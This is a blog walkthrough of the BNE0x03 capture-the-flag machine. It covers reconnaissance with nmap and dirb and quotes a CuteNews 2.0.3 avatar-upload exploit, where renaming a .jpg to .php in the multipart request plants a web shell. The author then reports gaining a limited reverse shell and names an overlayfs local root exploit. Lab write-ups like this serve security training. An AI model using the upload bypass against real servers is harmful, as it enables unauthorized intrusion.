Friday, 6 May 2016

BNE0x03 challenge

Hi again,
Today I would like to present BNE0x03 walkthrough.

So, as always we should find our target
root@osboxes:~# nmap -sP 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:02 BST
[CUT]
Nmap scan report for 192.168.1.102
Host is up (0.0018s latency).
MAC Address: 00:0C:29:4E:16:F6 (VMware)
[CUT]

root@osboxes:~# nmap -sV 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:05 BST
Nmap scan report for 192.168.1.102
Host is up (0.0011s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

[CUT]
Scanning all ports does not give us differnt result.
Now, we browse our target

Maybe exist some exploit for CuteNews v.2.0.3? I don't know, but probably I will verify it.
Let's run dirb now.
root@osboxes:~# dirb http://192.168.1.102/

[CUT]

==> DIRECTORY: http://192.168.1.102/core/                                     
==> DIRECTORY: http://192.168.1.102/docs/                                     
+ http://192.168.1.102/favicon.ico (CODE:200|SIZE:1150)                       
+ http://192.168.1.102/index.php (CODE:200|SIZE:2487)                         
+ http://192.168.1.102/server-status (CODE:403|SIZE:293)                      
==> DIRECTORY: http://192.168.1.102/skins/                                    
==> DIRECTORY: http://192.168.1.102/uploads/ 
It looks interesting, probably the application has upload feathure.
I was trying bypass authentication via SQL Injection but without success. But I found exploit to CuteNews 2.0.3.
==========================================================
 # Exploit  :
  
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
   
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
   
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
OK, so we have to follow the instruction. I register some account
 and I am logged into the application now :-)

Great, now we have to go to the Personal options and upload our avatar (reverse shell). I have uploaded my reverse shell file and I have got











Excellent we have got limited shell.
$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I know that all what we need is exploit to get root privileges. I found Ubuntu 14.04 LTS, 15.10 - overlayfs Local Root Exploit.
I leave you now at this stage to complete the challenge as an exercise for you :-)











Game over!
at